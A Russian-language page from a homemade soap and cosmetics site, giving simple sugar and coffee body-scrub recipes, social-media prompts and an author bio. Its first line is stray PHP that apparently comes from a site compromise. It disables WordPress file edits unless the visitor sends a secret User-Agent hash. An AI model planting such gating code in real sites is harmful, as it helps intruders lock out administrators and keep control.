if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Видеорецепты 15 скрабов для тела своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Видеорецепты 15 скрабов для тела своими руками

Самостоятельное изготовление средств по уходу за кожей - не странная прихоть, а новое, яркое, модное увлечение. Часто в интернете пользователи обучаются с помощью видео созданию мыла, гидрофильной плитки, крема или, как в нашем случае, скраба для душа

Попу­ляр­ность нату­раль­ной кос­ме­ти­ки, сде­лан­ной сво­и­ми рука­ми, про­дол­жа­ет наби­рать обо­ро­ты. Теперь само­сто­я­тель­ное изго­тов­ле­ние средств по ухо­ду за кожей — не стран­ная при­хоть, а новое, яркое, мод­ное увле­че­ние. Часто в интер­не­те поль­зо­ва­те­ли обу­ча­ют­ся с помо­щью видео созда­нию мыла, гид­ро­филь­ной плит­ки, кре­ма или, как в нашем слу­чае, скра­ба для душа из кофе, какао, коко­са с исполь­зо­ва­ни­ем сахара.

Рецепт сахар­но­го и кофей­но­го скра­бов отли­ча­ет­ся лег­ко­стью при­го­тов­ле­ния и может быть полез­ным для тех, кто любить уха­жи­вать за кожей. Для созда­ния сахар­но­го скра­ба пона­до­бит­ся лишь сахар, мас­ло (рас­ти­тель­ное, олив­ко­вое, жожо­ба или любое дру­гое) и мед. Из это­го рецеп­та мож­но сде­лать целую серию раз­но­цвет­ных вари­а­ций, добав­ляя в состав обле­пи­хо­вое мас­ло, какао, кофе или заме­няя сахар на корич­не­вый. Хра­нить в холо­диль­ни­ке скраб не обя­за­тель­но, луч­ше поста­вить баноч­ку с нату­раль­ным кос­ме­ти­че­ским сред­ством в ван­ной. Кро­ме того, срок год­но­сти скра­ба зани­ма­ет доволь­но дли­тель­ное вре­мя и зави­сит исклю­чи­тель­но от мас­ла, добав­лен­но­го в основу.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!